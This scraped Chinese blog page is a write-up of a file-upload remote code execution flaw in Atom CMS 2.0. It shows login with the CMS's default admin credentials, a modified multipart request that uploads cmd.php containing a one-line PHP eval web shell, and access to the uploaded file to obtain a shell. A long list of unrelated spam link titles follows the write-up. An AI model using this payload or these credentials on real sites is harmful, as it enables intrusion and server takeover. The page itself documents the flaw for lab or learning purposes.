当前位置: 首页 > news >正文

网站动态页面网络书城网站开发 需求分析

网站动态页面,网络书城网站开发 需求分析,做游戏直播什么游戏视频网站好,WordPress中文空格漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。 其实这就是一个文件上传漏洞罢了。。。。 打开之后,/home路由是个空白 信息搜集&…

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225

http://www.yayakq.cn/news/871937/

相关文章:

  • js 访问网站统计刷新不增加次数网站快速备案安全
  • 建设网站的市场机会在哪个网站做跨境电商
  • 做网站时 404网页如何指向定手机网站建设
  • 如何做网站走查做金融在那个网站上找工作
  • 公司网站开发费用济南兴田德润简介图片asp.net网站开发视频教程
  • 即墨市城乡建设局网站安顺网站建设兼职
  • 好的手机端网站模板下载绵阳观察怎么登录不上
  • 基木鱼建站教程重庆森林百度云
  • 怎么做冒牌网站南宁网站设计方案
  • 汕头网络公司网站建设实战营销型网站建设
  • 超酷网站模板适合工作室做的项目
  • 备案 几个网站慧聪网seo页面优化
  • 网站卡的原因小程序制作平台排行榜前十名
  • 企业网站的建设与实现论文网站开发亿码酷流量
  • 网站几个数据库家装公司官网
  • 机械类网站用什么做背景有赞和微盟哪个更好用
  • 南京维露斯网站建设天桥网站建设
  • 开发电商网站域名注册哪个最好
  • 怎么建小说网站网站建设维护多少钱
  • 怎样设计网站主页360优化大师下载
  • 迁安做网站中的cms开发设计师导航网址
  • 网站界面设计基础找网站公司做网站是怎样的流程
  • 网站设计合同范本泰州网站建设优化建站
  • 企业网站建设规划书的内容音乐中文网站模板
  • 网站项目需求说明书建设工程公司采购的网站
  • 网站开发 功能不会写自己做的网站怎么爬数据库
  • 建同城购物网站经历怎样自己做商场网站
  • 做网站公司价格唐山做网站的电话
  • 台州市建设规划局路桥分局网站钉钉网站建设服务协议
  • 怎样可以开网站临海高端网站设计新感觉建站